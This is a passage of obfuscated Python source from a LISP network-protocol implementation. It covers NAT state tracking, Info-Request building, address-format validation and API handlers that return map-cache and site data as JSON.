IIII = "{} NAT state for {}, RLOC {}, port {}" . format ( "{}" ,
blue ( hostname , False ) , red ( O0O0 , False ) , port )
if 23 - 23: iIii1I11I1II1 + I1ii11iIi11i * ooOoO0o - OOooOOo % O0
iiii1i11 = lisp_nat_info ( O0O0 , hostname , port )
if 67 - 67: i1IIi . oO0o
if ( hostname not in lisp_nat_state_info ) :
lisp_nat_state_info [ hostname ] = [ iiii1i11 ]
lprint ( IIII . format ( "Store initial" ) )
return ( True )
if 17 - 17: iII111i * I1IiiI % I1Ii111 + OoOoOO00 * ooOoO0o - O0
if 36 - 36: O0 / I11i % OoOoOO00 % OoOoOO00 * iII111i
if 99 - 99: o0oOOo0O0Ooo - iIii1I11I1II1 * OoO0O00 - oO0o * oO0o % IiII
if 44 - 44: I11i / I1ii11iIi11i
if 67 - 67: iIii1I11I1II1 / I1IiiI / I1IiiI . O0 * iII111i
if 26 - 26: i1IIi - I1Ii111 - ooOoO0o
iII1ii1 = lisp_nat_state_info [ hostname ] [ 0 ]
if ( iII1ii1 . address == O0O0 and iII1ii1 . port == port ) :
iII1ii1 . uptime = lisp_get_timestamp ( )
lprint ( IIII . format ( "Refresh existing" ) )
return ( False )
if 73 - 73: o0oOOo0O0Ooo . OoooooooOO
if 96 - 96: i1IIi - OOooOOo / I11i % OoOoOO00 - i11iIiiIii % II111iiii
if 47 - 47: I1Ii111 * iII111i
if 90 - 90: i1IIi * Ii1I . OoO0O00 % I11i * ooOoO0o . OOooOOo
if 76 - 76: iIii1I11I1II1 . i11iIiiIii * II111iiii - iII111i
if 51 - 51: I1IiiI
if 52 - 52: I1Ii111
o0ooO0 = None
for iII1ii1 in lisp_nat_state_info [ hostname ] :
if ( iII1ii1 . address == O0O0 and iII1ii1 . port == port ) :
o0ooO0 = iII1ii1
break
if 7 - 7: I11i % O0 * i11iIiiIii % I1Ii111 - I1Ii111 % Oo0Ooo
if 83 - 83: i1IIi
if 23 - 23: oO0o * II111iiii * i1IIi
if ( o0ooO0 == None ) :
lprint ( IIII . format ( "Store new" ) )
else :
lisp_nat_state_info [ hostname ] . remove ( o0ooO0 )
lprint ( IIII . format ( "Use previous" ) )
if 14 - 14: Ii1I - I11i / i1IIi * OoOoOO00 * ooOoO0o
if 78 - 78: iII111i % I1ii11iIi11i . I11i
oo00O0oO000o = lisp_nat_state_info [ hostname ]
lisp_nat_state_info [ hostname ] = [ iiii1i11 ] + oo00O0oO000o
return ( True )
if 29 - 29: IiII . ooOoO0o . OOooOOo % I11i . I1Ii111
if 75 - 75: OOooOOo % Oo0Ooo + iIii1I11I1II1 . I11i
if 92 - 92: I1ii11iIi11i / ooOoO0o
if 21 - 21: OoO0O00 % II111iiii / OoooooooOO
if 4 - 4: i11iIiiIii + OoooooooOO * i1IIi * iIii1I11I1II1 - OOooOOo
if 23 - 23: ooOoO0o + Oo0Ooo
if 43 - 43: Ii1I
if 87 - 87: OoO0O00
def lisp_get_nat_info ( rloc , hostname ) :
if ( hostname not in lisp_nat_state_info ) : return ( None )
if 32 - 32: I11i
O0O0 = rloc . print_address_no_iid ( )
for iII1ii1 in lisp_nat_state_info [ hostname ] :
if ( iII1ii1 . address == O0O0 ) : return ( iII1ii1 )
if 78 - 78: ooOoO0o * iII111i
return ( None )
if 31 - 31: I1IiiI + OOooOOo . OoooooooOO
if 24 - 24: ooOoO0o
if 53 - 53: I1ii11iIi11i % OOooOOo
if 92 - 92: I1IiiI / ooOoO0o
if 5 - 5: OoooooooOO - oO0o
if 52 - 52: I11i . OOooOOo * ooOoO0o / i11iIiiIii . OoO0O00 * ooOoO0o
if 58 - 58: i1IIi - OoO0O00 * II111iiii
if 92 - 92: ooOoO0o / I1Ii111 . iII111i
if 59 - 59: Ii1I - OoO0O00 % iII111i + I1ii11iIi11i * iII111i
if 51 - 51: ooOoO0o - Oo0Ooo / iII111i . I11i - Ii1I / OOooOOo
if 4 - 4: II111iiii + OoOoOO00 . ooOoO0o - I11i . I1IiiI
if 46 - 46: II111iiii
if 38 - 38: OOooOOo % II111iiii
if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
if 89 - 89: I1Ii111
if 29 - 29: I11i * ooOoO0o - OoooooooOO
if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
def lisp_build_info_requests ( lisp_sockets , dest , port ) :
if ( lisp_nat_traversal == False ) : return
if 71 - 71: I1ii11iIi11i - II111iiii / O0 % i1IIi + oO0o
if 73 - 73: OoooooooOO
if 25 - 25: i1IIi . II111iiii . I1Ii111
if 81 - 81: II111iiii + OoOoOO00 * II111iiii / iIii1I11I1II1 - Oo0Ooo % oO0o
if 66 - 66: ooOoO0o % O0 + iIii1I11I1II1 * I1Ii111 - I1Ii111
if 61 - 61: I1ii11iIi11i
i1IiIi = [ ]
IiiiIIiII = [ ]
if ( dest == None ) :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
IiiiIIiII . append ( iii1i . map_resolver )
if 60 - 60: ooOoO0o % Ii1I
i1IiIi = IiiiIIiII
if ( i1IiIi == [ ] ) :
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) :
i1IiIi . append ( oO00000oOO . map_server )
if 33 - 33: OoO0O00 . II111iiii % iIii1I11I1II1
if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
if ( i1IiIi == [ ] ) : return
else :
i1IiIi . append ( dest )
if 3 - 3: Ii1I
if 71 - 71: iIii1I11I1II1 . OOooOOo / I11i / i1IIi
if 69 - 69: i1IIi / iII111i + Ii1I + I11i + IiII
if 86 - 86: Oo0Ooo
if 97 - 97: I1IiiI
OOO0O0Oo0O0 = { }
for OoO0oO in lisp_db_list :
for OOOoOoo in OoO0oO . rloc_set :
lisp_update_local_rloc ( OOOoOoo )
if ( OOOoOoo . rloc . is_null ( ) ) : continue
if ( OOOoOoo . interface == None ) : continue
if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
IiI = OOOoOoo . rloc . print_address_no_iid ( )
if ( IiI in OOO0O0Oo0O0 ) : continue
OOO0O0Oo0O0 [ IiI ] = OOOoOoo . interface
if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
if ( OOO0O0Oo0O0 == { } ) :
lprint ( 'Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings" )
if 94 - 94: I11i . i1IIi / II111iiii + OOooOOo
return
if 64 - 64: I1IiiI % ooOoO0o
if 72 - 72: O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
if 80 - 80: OOooOOo * I11i / OOooOOo - oO0o
if 18 - 18: i1IIi - OOooOOo - o0oOOo0O0Ooo - iIii1I11I1II1
if 72 - 72: OoooooooOO % I1IiiI . OoO0O00
if 28 - 28: II111iiii / iIii1I11I1II1 / iII111i - o0oOOo0O0Ooo . I1IiiI / O0
for IiI in OOO0O0Oo0O0 :
i111IIiIiiI1 = OOO0O0Oo0O0 [ IiI ]
OO0O00o0 = red ( IiI , False )
lprint ( "Build Info-Request for private address {} ({})" . format ( OO0O00o0 ,
i111IIiIiiI1 ) )
ooO000OO = i111IIiIiiI1 if len ( OOO0O0Oo0O0 ) > 1 else None
for dest in i1IiIi :
lisp_send_info_request ( lisp_sockets , dest , port , ooO000OO )
if 16 - 16: ooOoO0o * oO0o . OoooooooOO
if 44 - 44: iIii1I11I1II1 * OOooOOo + OoO0O00 - OoooooooOO
if 13 - 13: Oo0Ooo . I11i . II111iiii
if 6 - 6: OOooOOo . IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
if 85 - 85: i11iIiiIii + OoOoOO00
if 4 - 4: OOooOOo . OoO0O00 * II111iiii + OoO0O00 % Oo0Ooo
if ( IiiiIIiII != [ ] ) :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
iii1i . resolve_dns_name ( )
if 60 - 60: OOooOOo . Ii1I
if 13 - 13: i1IIi . iII111i / OoOoOO00 . I1Ii111
return
if 65 - 65: oO0o % I1Ii111 % OoO0O00 . iIii1I11I1II1
if 38 - 38: IiII / I11i / IiII * iII111i
if 30 - 30: oO0o
if 30 - 30: IiII / OoO0O00
if 89 - 89: oO0o . OoOoOO00 . IiII / iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00
if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if 54 - 54: OoOoOO00 / i1IIi + OOooOOo - I1ii11iIi11i - I1IiiI * I1Ii111
if 91 - 91: OoooooooOO * OoooooooOO
if 27 - 27: ooOoO0o / I1IiiI * I1ii11iIi11i . o0oOOo0O0Ooo
if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
if 33 - 33: OOooOOo % OoooooooOO
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if 98 - 98: Ii1I
if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
if 95 - 95: iIii1I11I1II1 / O0 % O0
if 53 - 53: ooOoO0o . ooOoO0o
if ( value . find ( "." ) != - 1 ) :
IiI = value . split ( "." )
if ( len ( IiI ) != 4 ) : return ( False )
if 80 - 80: i11iIiiIii % I1Ii111 % I1IiiI / I1IiiI + oO0o + iII111i
for OoiIiiIi11 in IiI :
if ( OoiIiiIi11 . isdigit ( ) == False ) : return ( False )
if ( int ( OoiIiiIi11 ) > 255 ) : return ( False )
if 18 - 18: OoO0O00 * ooOoO0o
return ( True )
if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
if 67 - 67: I1IiiI
if 32 - 32: oO0o * i11iIiiIii - I11i % Oo0Ooo * I1ii11iIi11i
if 79 - 79: II111iiii / Oo0Ooo / I1ii11iIi11i
if ( value . find ( "-" ) != - 1 ) :
IiI = value . split ( "-" )
for iIi1iIIIiIiI in [ "N" , "S" , "W" , "E" ] :
if ( iIi1iIIIiIiI in IiI ) :
if ( len ( IiI ) < 8 ) : return ( False )
return ( True )
if 30 - 30: I11i . o0oOOo0O0Ooo / II111iiii
if 59 - 59: i11iIiiIii
if 5 - 5: i11iIiiIii + o0oOOo0O0Ooo . OoO0O00 % OoOoOO00 + I11i
if 59 - 59: I1ii11iIi11i
if 47 - 47: I1IiiI + Oo0Ooo
if 78 - 78: i1IIi / I1ii11iIi11i % ooOoO0o * OoO0O00
if 10 - 10: i1IIi % ooOoO0o / iII111i
if ( value . find ( "-" ) != - 1 ) :
IiI = value . split ( "-" )
if ( len ( IiI ) != 3 ) : return ( False )
if 98 - 98: IiII / o0oOOo0O0Ooo - i1IIi - OOooOOo
for O00OoO in IiI :
try : int ( O00OoO , 16 )
except : return ( False )
if 10 - 10: IiII
return ( True )
if 33 - 33: i11iIiiIii . i1IIi . I1Ii111 - OoOoOO00 + OOooOOo
if 34 - 34: I1ii11iIi11i . i1IIi * O0 / OoooooooOO
if 22 - 22: OOooOOo % o0oOOo0O0Ooo - i11iIiiIii
if 58 - 58: IiII . Ii1I + II111iiii
if 31 - 31: i11iIiiIii + i11iIiiIii + I11i * Oo0Ooo . I11i
if ( value . find ( ":" ) != - 1 ) :
IiI = value . split ( ":" )
if ( len ( IiI ) < 2 ) : return ( False )
if 28 - 28: OOooOOo * iIii1I11I1II1 * OoOoOO00
OOO0OoOO0O = False
O0oo0oOo = 0
for O00OoO in IiI :
O0oo0oOo += 1
if ( O00OoO == "" ) :
if ( OOO0OoOO0O ) :
if ( len ( IiI ) == O0oo0oOo ) : break
if ( O0oo0oOo > 2 ) : return ( False )
if 58 - 58: II111iiii - OOooOOo . IiII % O0
OOO0OoOO0O = True
continue
if 53 - 53: o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
try : int ( O00OoO , 16 )
except : return ( False )
if 34 - 34: OOooOOo
return ( True )
if 2 - 2: I1Ii111 / o0oOOo0O0Ooo + I11i * Ii1I
if 1 - 1: i11iIiiIii * OoO0O00 * OoO0O00
if 25 - 25: ooOoO0o / i11iIiiIii / OoOoOO00 % O0 / OoooooooOO
if 28 - 28: ooOoO0o % i1IIi - oO0o * II111iiii
if 79 - 79: o0oOOo0O0Ooo . ooOoO0o . Oo0Ooo * OoooooooOO
if ( value [ 0 ] == "+" ) :
IiI = value [ 1 : : ]
for o0o00O0OO0O0O in IiI :
if ( o0o00O0OO0O0O . isdigit ( ) == False ) : return ( False )
if 66 - 66: Oo0Ooo % IiII
return ( True )
if 30 - 30: IiII - iII111i * iIii1I11I1II1 % ooOoO0o
return ( False )
if 78 - 78: iIii1I11I1II1 % OoooooooOO . o0oOOo0O0Ooo
if 85 - 85: i11iIiiIii
if 96 - 96: OoOoOO00
if 12 - 12: oO0o % OoO0O00 % I1ii11iIi11i . IiII % ooOoO0o
if 11 - 11: O0 . i1IIi % ooOoO0o
if 84 - 84: OoO0O00 . ooOoO0o + o0oOOo0O0Ooo + I11i - I1ii11iIi11i
if 78 - 78: I11i % i11iIiiIii + iII111i * I1Ii111 % IiII % I1Ii111
if 22 - 22: OOooOOo
if 11 - 11: iIii1I11I1II1 + i1IIi % I1IiiI % I1Ii111
if 49 - 49: Oo0Ooo / I1ii11iIi11i / I1IiiI * OoooooooOO . I1ii11iIi11i
if 100 - 100: iIii1I11I1II1 . i1IIi / OOooOOo * i11iIiiIii
if 93 - 93: I1ii11iIi11i
if 45 - 45: I1ii11iIi11i * I1ii11iIi11i
if 31 - 31: OoO0O00 - OOooOOo . iII111i * I1Ii111 * iII111i + I1ii11iIi11i
def lisp_process_api ( process , lisp_socket , data_structure ) :
iIOooo00OO , I1iII1IIi1IiI = data_structure . split ( "%" )
if 83 - 83: Ii1I % iIii1I11I1II1 / I1ii11iIi11i + I11i
lprint ( "Process API request '{}', parameters: '{}'" . format ( iIOooo00OO ,
I1iII1IIi1IiI ) )
if 23 - 23: iIii1I11I1II1 - I1IiiI
iiooo0o0oO = [ ]
if ( iIOooo00OO == "map-cache" ) :
if ( I1iII1IIi1IiI == "" ) :
iiooo0o0oO = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , iiooo0o0oO )
else :
iiooo0o0oO = lisp_process_api_map_cache_entry ( json . loads ( I1iII1IIi1IiI ) )
if 51 - 51: OoooooooOO / IiII / I1ii11iIi11i . Oo0Ooo - o0oOOo0O0Ooo * OoooooooOO
if 40 - 40: OoO0O00 / IiII . O0 / I1IiiI + OoO0O00 . o0oOOo0O0Ooo
if ( iIOooo00OO == "site-cache" ) :
if ( I1iII1IIi1IiI == "" ) :
iiooo0o0oO = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
iiooo0o0oO )
else :
iiooo0o0oO = lisp_process_api_site_cache_entry ( json . loads ( I1iII1IIi1IiI ) )
if 25 - 25: ooOoO0o * I1Ii111 * oO0o
if 64 - 64: Ii1I / I1ii11iIi11i
if ( iIOooo00OO == "site-cache-summary" ) :
iiooo0o0oO = lisp_process_api_site_cache_summary ( lisp_sites_by_eid )
if 30 - 30: OoooooooOO + O0 / I1ii11iIi11i * o0oOOo0O0Ooo
if ( iIOooo00OO == "map-server" ) :
I1iII1IIi1IiI = { } if ( I1iII1IIi1IiI == "" ) else json . loads ( I1iII1IIi1IiI )
iiooo0o0oO = lisp_process_api_ms_or_mr ( True , I1iII1IIi1IiI )
if 11 - 11: O0 + OoO0O00 - Oo0Ooo - Oo0Ooo . i11iIiiIii
if ( iIOooo00OO == "map-resolver" ) :
I1iII1IIi1IiI = { } if ( I1iII1IIi1IiI == "" ) else json . loads ( I1iII1IIi1IiI )
iiooo0o0oO = lisp_process_api_ms_or_mr ( False , I1iII1IIi1IiI )
if 15 - 15: Ii1I % i11iIiiIii / OoOoOO00
if ( iIOooo00OO == "database-mapping" ) :
iiooo0o0oO = lisp_process_api_database_mapping ( )
if 85 - 85: ooOoO0o . i1IIi / iII111i % iIii1I11I1II1 / II111iiii / I1Ii111
if 60 - 60: iIii1I11I1II1 - iIii1I11I1II1 . I11i
if 55 - 55: OoO0O00
if 87 - 87: Ii1I - iII111i / O0 - o0oOOo0O0Ooo - iIii1I11I1II1 % Ii1I
if 47 - 47: iII111i * I1Ii111 % o0oOOo0O0Ooo / OoOoOO00 / OoO0O00 % OoO0O00
iiooo0o0oO = json . dumps ( iiooo0o0oO )
OO = lisp_api_ipc ( process , iiooo0o0oO )
lisp_ipc ( OO , lisp_socket , "lisp-core" )
return
if 43 - 43: Oo0Ooo
if 34 - 34: OoO0O00 . i1IIi + IiII * IiII
if 76 - 76: OOooOOo
if 54 - 54: O0 * II111iiii * OOooOOo
if 44 - 44: I1IiiI
if 66 - 66: o0oOOo0O0Ooo
if 40 - 40: OOooOOo * Ii1I
def lisp_process_api_map_cache ( mc , data ) :
if 38 - 38: ooOoO0o
if 5 - 5: OoooooooOO + iII111i - I11i
if 95 - 95: OOooOOo / i11iIiiIii - Ii1I + I1ii11iIi11i
if 7 - 7: I1ii11iIi11i
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if 37 - 37: O0 . II111iiii
if ( mc . source_cache == None ) : return ( [ True , data ] )
if 70 - 70: o0oOOo0O0Ooo / iII111i + i1IIi + I11i % iIii1I11I1II1 % Oo0Ooo
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
if 19 - 19: iIii1I11I1II1 / Oo0Ooo . O0 - Oo0Ooo
if 74 - 74: I1ii11iIi11i * OoooooooOO . iII111i
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
if 45 - 45: I1IiiI - IiII % ooOoO0o - IiII . Oo0Ooo - o0oOOo0O0Ooo
if 27 - 27: iII111i
if 64 - 64: iIii1I11I1II1 - OOooOOo . iII111i % o0oOOo0O0Ooo / II111iiii % OoooooooOO
if 87 - 87: OoooooooOO
if 70 - 70: o0oOOo0O0Ooo % OoooooooOO % I1IiiI . OoOoOO00 * I1IiiI - ooOoO0o
if 92 - 92: I1IiiI . I11i
if 66 - 66: I1Ii111 / I11i / OoooooooOO % OoOoOO00 . oO0o * iII111i
def lisp_gather_map_cache_data ( mc , data ) :
oo0O00OOOOO = { }
oo0O00OOOOO [ "instance-id" ] = str ( mc . eid . instance_id )
oo0O00OOOOO [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
oo0O00OOOOO [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
if 34 - 34: I1ii11iIi11i * I1ii11iIi11i % I11i / OOooOOo % oO0o . OoOoOO00
oo0O00OOOOO [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
oo0O00OOOOO [ "expires" ] = lisp_print_elapsed ( mc . uptime )
oo0O00OOOOO [ "action" ] = lisp_map_reply_action_string [ mc . action ]
oo0O00OOOOO [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
if 25 - 25: I1ii11iIi11i / I11i + i1IIi . I1IiiI + ooOoO0o
if 29 - 29: IiII + I1ii11iIi11i
if 8 - 8: IiII % I1IiiI
if 10 - 10: OoooooooOO / OoOoOO00
if 77 - 77: OoOoOO00
OO00O000OOO = [ ]
for iIIiI11 in mc . rloc_set :
iiiI1I = lisp_fill_rloc_in_json ( iIIiI11 )
if 10 - 10: IiII / i11iIiiIii
if 19 - 19: OoO0O00
if 100 - 100: I1ii11iIi11i - I1ii11iIi11i
if 38 - 38: I1Ii111
if 23 - 23: Ii1I . I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
if ( iIIiI11 . rloc . is_multicast_address ( ) ) :
iiiI1I [ "multicast-rloc-set" ] = [ ]
for O0o00O00oo0oO in list ( iIIiI11 . multicast_rloc_probe_list . values ( ) ) :
iii1i = lisp_fill_rloc_in_json ( O0o00O00oo0oO )
iiiI1I [ "multicast-rloc-set" ] . append ( iii1i )
if 92 - 92: I1Ii111 - I1IiiI + Ii1I / iII111i % OOooOOo
if 32 - 32: i1IIi . iII111i - Ii1I % iII111i % II111iiii - oO0o
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
OO00O000OOO . append ( iiiI1I )
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
oo0O00OOOOO [ "rloc-set" ] = OO00O000OOO
if 79 - 79: iII111i + IiII % I11i . Oo0Ooo / IiII * iII111i
data . append ( oo0O00OOOOO )
return ( [ True , data ] )
if 40 - 40: iII111i - I1IiiI + OoOoOO00
if 2 - 2: I11i - II111iiii / I1Ii111
if 27 - 27: OoO0O00 - I1ii11iIi11i * i11iIiiIii + Oo0Ooo
if 29 - 29: I1ii11iIi11i / IiII . I1Ii111 + Ii1I + OoO0O00
if 76 - 76: ooOoO0o . I11i * OoO0O00
if 53 - 53: II111iiii / OoOoOO00 / IiII * oO0o
if 52 - 52: O0 % iII111i * iIii1I11I1II1 / I11i / I1IiiI * ooOoO0o
if 93 - 93: iIii1I11I1II1 . II111iiii * OOooOOo - iIii1I11I1II1 . oO0o % Oo0Ooo
def lisp_fill_rloc_in_json ( rloc ) :
iiiI1I = { }
O0O0 = None
if ( rloc . rloc_exists ( ) ) :
iiiI1I [ "address" ] = rloc . rloc . print_address_no_iid ( )
O0O0 = iiiI1I [ "address" ]
if 92 - 92: OoO0O00
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 % ooOoO0o
if ( rloc . translated_port != 0 ) :
iiiI1I [ "encap-port" ] = str ( rloc . translated_port )
O0O0 += ":" + iiiI1I [ "encap-port" ]
if 7 - 7: Oo0Ooo / ooOoO0o + o0oOOo0O0Ooo
if 38 - 38: o0oOOo0O0Ooo . O0 - OoO0O00 % I11i
if ( O0O0 and O0O0 in lisp_crypto_keys_by_rloc_encap ) :
III = lisp_crypto_keys_by_rloc_encap [ O0O0 ] [ 1 ]
if ( III != None and III . shared_key != None ) :
iiiI1I [ "encap-crypto" ] = "crypto-" + III . cipher_suite_string
if 80 - 80: o0oOOo0O0Ooo
if 100 - 100: iIii1I11I1II1 . OoOoOO00 . OoooooooOO / I1ii11iIi11i - I1IiiI * I11i
if 5 - 5: i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1IiiI - II111iiii
iiiI1I [ "state" ] = rloc . print_state ( )
if ( rloc . geo ) : iiiI1I [ "geo" ] = rloc . geo . print_geo ( )
if ( rloc . elp ) : iiiI1I [ "elp" ] = rloc . elp . print_elp ( False )
if ( rloc . rle ) : iiiI1I [ "rle" ] = rloc . rle . print_rle ( False , False )
if ( rloc . json ) : iiiI1I [ "json" ] = rloc . json . print_json ( False )
if ( rloc . rloc_name ) : iiiI1I [ "rloc-name" ] = rloc . rloc_name
IIIii1i = rloc . stats . get_stats ( False , False )
if ( IIIii1i ) : iiiI1I [ "stats" ] = IIIii1i
iiiI1I [ "uptime" ] = lisp_print_elapsed ( rloc . uptime )
iiiI1I [ "upriority" ] = str ( rloc . priority )
iiiI1I [ "uweight" ] = str ( rloc . weight )
iiiI1I [ "mpriority" ] = str ( rloc . mpriority )
iiiI1I [ "mweight" ] = str ( rloc . mweight )
iIiiI11iIIi11 = rloc . last_rloc_probe_reply
if ( iIiiI11iIIi11 ) :
iiiI1I [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( iIiiI11iIIi11 )
iiiI1I [ "rloc-probe-rtt" ] = str ( rloc . rloc_probe_rtt )
if 9 - 9: ooOoO0o - oO0o . OoO0O00 . o0oOOo0O0Ooo / Oo0Ooo
iiiI1I [ "rloc-hop-count" ] = rloc . rloc_probe_hops
iiiI1I [ "recent-rloc-hop-counts" ] = rloc . recent_rloc_probe_hops
if 78 - 78: OoOoOO00 - II111iiii - o0oOOo0O0Ooo * iII111i . o0oOOo0O0Ooo
iiiI1I [ "rloc-probe-latency" ] = rloc . rloc_probe_latency
iiiI1I [ "recent-rloc-probe-latencies" ] = rloc . recent_rloc_probe_latencies
if 9 - 9: iIii1I11I1II1 . iII111i % OoOoOO00 + o0oOOo0O0Ooo
OOoo0o000 = [ ]
for OOOooOOoOO0o in rloc . recent_rloc_probe_rtts : OOoo0o000 . append ( str ( OOOooOOoOO0o ) )
iiiI1I [ "recent-rloc-probe-rtts" ] = OOoo0o000
return ( iiiI1I )
if 63 - 63: o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
if 55 - 55: IiII / ooOoO0o * I1IiiI / I1Ii111 - Oo0Ooo % o0oOOo0O0Ooo
if 82 - 82: OoO0O00 - iIii1I11I1II1 . Oo0Ooo / IiII . OoO0O00
def lisp_process_api_map_cache_entry ( parms ) :
oooo = parms [ "instance-id" ]
oooo = 0 if ( oooo == "" ) else int ( oooo )
if 47 - 47: OOooOOo + IiII
if 11 - 11: Oo0Ooo + I1IiiI % i11iIiiIii % Oo0Ooo + ooOoO0o + i1IIi
if 100 - 100: II111iiii - OOooOOo + iII111i - i11iIiiIii . O0 / iII111i
if 64 - 64: Ii1I
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
o0Ooo0Oooo0o . store_prefix ( parms [ "eid-prefix" ] )
IIi11ii = o0Ooo0Oooo0o
O0oo0OoO0oo = o0Ooo0Oooo0o
if 4 - 4: OoOoOO00
if 78 - 78: i1IIi - iII111i + O0 - I1IiiI % o0oOOo0O0Ooo
if 48 - 48: iII111i / II111iiii * I1Ii111 + I11i / ooOoO0o . OoOoOO00
if 45 - 45: OOooOOo / Ii1I % O0
if 7 - 7: oO0o * i11iIiiIii + OoooooooOO + I11i
oo0oOooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
if ( "group-prefix" in parms ) :
oo0oOooo0O . store_prefix ( parms [ "group-prefix" ] )
IIi11ii = oo0oOooo0O
if 9 - 9: II111iiii * Oo0Ooo * I1Ii111 . IiII
if 80 - 80: i11iIiiIii . i11iIiiIii . i11iIiiIii . OoooooooOO - OOooOOo * OoooooooOO
iiooo0o0oO = [ ]
I11iiI1III = lisp_map_cache_lookup ( O0oo0OoO0oo , IIi11ii )
if ( I11iiI1III ) : o0o0O0O0Oooo0 , iiooo0o0oO = lisp_process_api_map_cache ( I11iiI1III , iiooo0o0oO )
return ( iiooo0o0oO )
if 96 - 96: oO0o
if 80 - 80: IiII - oO0o % Ii1I - iIii1I11I1II1 . OoO0O00
if 64 - 64: I1IiiI % i11iIiiIii / oO0o
if 78 - 78: II111iiii - Oo0Ooo . iIii1I11I1II1 - ooOoO0o . oO0o
if 84 - 84: iII111i . ooOoO0o * I1IiiI * Oo0Ooo / I1Ii111
if 93 - 93: i1IIi * i11iIiiIii % OoOoOO00 % iII111i
if 31 - 31: OoO0O00
if 89 - 89: II111iiii
if 33 - 33: OOooOOo / oO0o % OoOoOO00 * O0
if 65 - 65: OoO0O00 % OoOoOO00 % I1ii11iIi11i / OoooooooOO
if 85 - 85: O0 * OOooOOo % I1Ii111
def lisp_process_api_site_cache_summary ( site_cache ) :
I1io0oOOooOoo0oO = { "site" : "" , "registrations" : [ ] }
oo0O00OOOOO = { "eid-prefix" : "" , "count" : 0 , "registered-count" : 0 }
if 33 - 33: O0
IiiIIIiIIIii1II = { }
for iiii11I1 in site_cache . cache_sorted :
for ooOO00o in list ( site_cache . cache [ iiii11I1 ] . entries . values ( ) ) :
if ( ooOO00o . accept_more_specifics == False ) : continue
if ( ooOO00o . site . site_name not in IiiIIIiIIIii1II ) :
IiiIIIiIIIii1II [ ooOO00o . site . site_name ] = [ ]
if 33 - 33: OoO0O00
oO0ooOOO = copy . deepcopy ( oo0O00OOOOO )
oO0ooOOO [ "eid-prefix" ] = ooOO00o . eid . print_prefix ( )
oO0ooOOO [ "count" ] = len ( ooOO00o . more_specific_registrations )
for i111ii1ii in ooOO00o . more_specific_registrations :
if ( i111ii1ii . registered ) : oO0ooOOO [ "registered-count" ] += 1
if 37 - 37: OoooooooOO - Oo0Ooo % oO0o
IiiIIIiIIIii1II [ ooOO00o . site . site_name ] . append ( oO0ooOOO )
if 59 - 59: II111iiii - o0oOOo0O0Ooo / I1ii11iIi11i . oO0o / o0oOOo0O0Ooo - iII111i
if 65 - 65: I1ii11iIi11i * OOooOOo * ooOoO0o + oO0o - OOooOOo
if 100 - 100: iII111i
iiooo0o0oO = [ ]
for IIiii in IiiIIIiIIIii1II :
I111 = copy . deepcopy ( I1io0oOOooOoo0oO )
I111 [ "site" ] = IIiii
I111 [ "registrations" ] = IiiIIIiIIIii1II [ IIiii ]
iiooo0o0oO . append ( I111 )
if 12 - 12: OoooooooOO - I1ii11iIi11i * iII111i / ooOoO0o
return ( iiooo0o0oO )
